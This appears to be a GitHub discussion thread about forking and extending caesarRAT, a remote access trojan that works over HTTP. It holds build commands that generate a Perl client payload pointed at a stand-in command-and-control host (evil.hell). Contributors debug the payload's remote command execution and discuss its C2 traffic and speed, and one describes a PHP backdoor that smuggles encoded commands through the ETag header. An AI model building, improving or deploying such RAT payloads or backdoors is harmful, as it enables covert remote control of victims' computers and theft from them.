Closed. gottburgm closed this 6 years ago.
Instructions
git clone https://github.com/gottburgm/caesarRAT caesarRAT-forked
cd caesarRAT-forked
sh install.sh
cd Client
perl builder.pl perl_payload http://evil.hell/caesar_install/
client.py <=> outputs/perl_payload.pl
client.exe <=> outputs/perl_payload
Nice work! Thank you. One of the goals of the project is to "translate" the payload into as many languages as possible. I just tested your Perl payload and it works great apart from a few small problems.
cd
the payload changes the directory correctly but returns the following output to the server:
Warning: Couldn't Move To : <directory_name_here>
xcalc
the Perl payload waits until the calc is closed.
It should spawn a subprocess with the calc and add it to a list of subprocesses. For the rest it works perfectly, congratulations. I'll add it to the main project once it is fixed. My objective would be to create a single generator that allows selecting the type of payload, the language, the delay, etc.
Thanks for the feedback! The first bug will be fixed today, and for the second one I will need to look at how to handle this, because the Python way to manage processes is totally different from the Perl one that I usually use, but I will find something ;) I'll keep you posted!
Any update?
In fact I fixed the first bug in a few seconds yesterday but I forgot to commit hahahahaha. The second problem is really more problematic. I tried some stuff but it was really not stable. There is also a major problem, I think. Actually the number of requests done by the Python client is crazy, and with the Perl one there are fewer requests but still too many. The second problem that I have is the database stuff. The RAT is way too slow, because we are sending plaintext data, and we store it each time and read the database each time. I made a backdooring tool which gives you a fake shell and sends the commands to a PHP backdoor file. It was hard and I avoided the storing feature because it's too big. I was passing encoded instructions through the ETag HTTP header and storing all the outputs in files that I could read or download, but I made many precoded functions to be able to have something usable. What do you think?
The database is the only way to keep track of the user history (input, output, datetime of the request, datetime of the response and many more). In the future the target history will be exportable in a convenient dump in order to allow local analysis, so I think the database is important.
Caesar can be slow because HTTP is stateless. We're not connected directly via a socket, so in order to make the target execute a command we have to:
So the average response time is 2 or 3 seconds. Most of the free web services don't support sockets and don't let you open ports, so an HTTP implementation was the only possible thing to do.
I'm curious to see your backdooring tool, commit it if you want. I will give it a look.
Soon I'm also gonna test the new Perl shell (with the cd fix).
Yeah I see, let me think about it, because there are some other ways to make it faster. I will commit in 1 hour (I need to finish my raid in World of Warcraft kek).
Committed! There was a major stupid bug that removed the separator ("
Ok! I'm gonna test it in a few hours :)
Hello again!
I installed and tried your RAT and all was fine except one thing... I hate Python and the generated client payload was in Python 😃 So I made an equivalent in Perl. Let me know if you are interested in it and I will create a repo on my git with the file. I will also have a look at the pp packager and if I have time I will make a generator.